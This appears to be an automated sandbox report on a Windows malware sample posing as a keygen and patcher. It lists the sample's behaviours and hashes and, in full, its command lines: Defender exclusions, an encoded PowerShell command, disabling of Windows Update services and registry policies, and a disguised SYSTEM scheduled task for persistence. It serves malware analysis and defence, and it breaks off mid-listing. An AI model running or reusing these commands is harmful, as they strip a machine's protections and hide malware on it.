Analysis Overview
SHA256
60252cb1da971ae158edf5e7911d653a7c8137a19bef4261b792244eb297cac5
Threat Level: Likely malicious
The file 60252cb1da971ae158edf5e7911d653a7c8137a19bef4261b792244eb297cac5 was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Stops running service(s)
Modifies file permissions
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Launches sc.exe
Unsigned PE
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-09 04:11
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 04:11
Reported
2024-03-09 04:13
Platform
win7-20240221-en
Max time kernel
143s
Max time network
122s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\patcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\60252cb1da971ae158edf5e7911d653a7c8137a19bef4261b792244eb297cac5.exe
"C:\Users\Admin\AppData\Local\Temp\60252cb1da971ae158edf5e7911d653a7c8137a19bef4261b792244eb297cac5.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Users\Admin\AppData\Local\Temp\keygen.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Users\Admin\AppData\Local\Temp\patcher.exe
C:\Users\Admin\AppData\Local\Temp\keygen.exe
C:\Users\Admin\AppData\Local\Temp\keygen.exe
C:\Users\Admin\AppData\Local\Temp\patcher.exe
C:\Users\Admin\AppData\Local\Temp\patcher.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\patcher.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAdgBlAHEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AG0AaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAawB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcwAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHQAdgBlAHEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AG0AaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAawB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcwAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
C:\Windows\system32\sc.exe
sc config bits start= disabled
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
C:\Windows\system32\sc.exe
sc config dosvc start= disabled
C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\patcher.exe"
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
Files
\Users\Admin\AppData\Local\Temp\keygen.exe
| MD5 | eefac124a0e2761c1dcbf7924711e5f1 |
| SHA1 | 9fd030c73442f552c0fc88afaab0b976ea4dccee |
| SHA256 | ea2dd455c7a34b3c742bce0aa7805718fe2d20a84462598f5ebe7d721737166c |
| SHA512 | ff5d4e06574883c0a7eda29226d37a702e384cd0008eca6e3745eb30ac9fcb9db7cd50adddcf9014f04a23e32f24903484d9a94b15f865feb2a2fa68fa7d8e56 |
C:\Users\Admin\AppData\Local\Temp\patcher.exe
| MD5 | 20f98c28dc6301f7eef703af91a7a3df |
| SHA1 | 06af7b8dea7512385b8c5625eb1188a5ccd79e9e |
| SHA256 | 5fe9ade30d6e0b3e0595df061ef65932c72d85de070fe16ef76618bebaff8df5 |
| SHA512 | 3b58ccec45e7bc9c112daaeeaa0c49be9b965fd56ed4f494767e1e37ff1719faa43e03c313e63ea4ff17f6b979d5c81bfe23474d3ba82e93db476ac4e23a7d10 |
memory/2716-9-0x0000000000230000-0x0000000000231000-memory.dmp
memory/1300-12-0x0000000073A60000-0x000000007400B000-memory.dmp
memory/1300-13-0x0000000073A60000-0x000000007400B000-memory.dmp
memory/1300-14-0x0000000002560000-0x00000000025A0000-memory.dmp
memory/1300-15-0x0000000002560000-0x00000000025A0000-memory.dmp
memory/1300-16-0x0000000073A60000-0x000000007400B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | cd1b8d9c4092e941bb5e0baeb303d75f |
| SHA1 | db16dfd0de4a36370605ffcb7cc944483cbf2551 |
| SHA256 | c34095e8f7a5373a397336dde5551755c1ae86ab07b123938088e4e5d3b59717 |
| SHA512 | 5fd7dd75209adecc6f1c3fa0db9f731832aa591784a738b80d4a5d06cb1a7efa010660d66cb5aea2365eac42929a02c25c8d15fc995c0cecbffaa3bf765de70c |
memory/2628-22-0x0000000073A20000-0x0000000073FCB000-memory.dmp
memory/2628-23-0x00000000024F0000-0x0000000002530000-memory.dmp
memory/2628-24-0x0000000073A20000-0x0000000073FCB000-memory.dmp
memory/2628-25-0x00000000024F0000-0x0000000002530000-memory.dmp
memory/2628-26-0x0000000073A20000-0x0000000073FCB000-memory.dmp
memory/2716-27-0x0000000000400000-0x00000000005B4000-memory.dmp
memory/2716-28-0x0000000000230000-0x0000000000231000-memory.dmp
memory/1840-35-0x0000000000100000-0x0000000000350000-memory.dmp
memory/1840-38-0x000007FEF5460000-0x000007FEF5E4C000-memory.dmp
memory/1840-37-0x000000001B480000-0x000000001B6D0000-memory.dmp
memory/1840-39-0x000000001B1B0000-0x000000001B230000-memory.dmp
memory/1840-40-0x000000001B1B0000-0x000000001B230000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2404-46-0x000000001B3A0000-0x000000001B682000-memory.dmp
memory/2404-47-0x000007FEF27C0000-0x000007FEF315D000-memory.dmp
memory/2404-49-0x00000000025C0000-0x0000000002640000-memory.dmp
memory/2404-48-0x0000000001F90000-0x0000000001F98000-memory.dmp
memory/2404-50-0x00000000025C0000-0x0000000002640000-memory.dmp
memory/2404-51-0x000007FEF27C0000-0x000007FEF315D000-memory.dmp
memory/2404-52-0x00000000025C0000-0x0000000002640000-memory.dmp
memory/2404-53-0x00000000025C0000-0x0000000002640000-memory.dmp
memory/2404-54-0x000007FEF27C0000-0x000007FEF315D000-memory.dmp
memory/1840-55-0x000007FEF5460000-0x000007FEF5E4C000-memory.dmp
memory/1840-63-0x000007FEF5460000-0x000007FEF5E4C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 04:11
Reported
2024-03-09 04:14
Platform
win10v2004-20240226-en
Max time kernel
154s
Max time network
160s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\patcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Chrome\updater.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\60252cb1da971ae158edf5e7911d653a7c8137a19bef4261b792244eb297cac5.exe
"C:\Users\Admin\AppData\Local\Temp\60252cb1da971ae158edf5e7911d653a7c8137a19bef4261b792244eb297cac5.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Users\Admin\AppData\Local\Temp\keygen.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Users\Admin\AppData\Local\Temp\patcher.exe
C:\Users\Admin\AppData\Local\Temp\keygen.exe
C:\Users\Admin\AppData\Local\Temp\keygen.exe
C:\Users\Admin\AppData\Local\Temp\patcher.exe
C:\Users\Admin\AppData\Local\Temp\patcher.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3932 --field-trial-handle=2304,i,6987730730348465820,3913273227385401271,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\patcher.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAdgBlAHEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AG0AaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAawB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcwAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHQAdgBlAHEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AG0AaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAawB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcwAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
C:\Windows\system32\sc.exe
sc config bits start= disabled
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
C:\Windows\system32\sc.exe
sc config dosvc start= disabled
C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
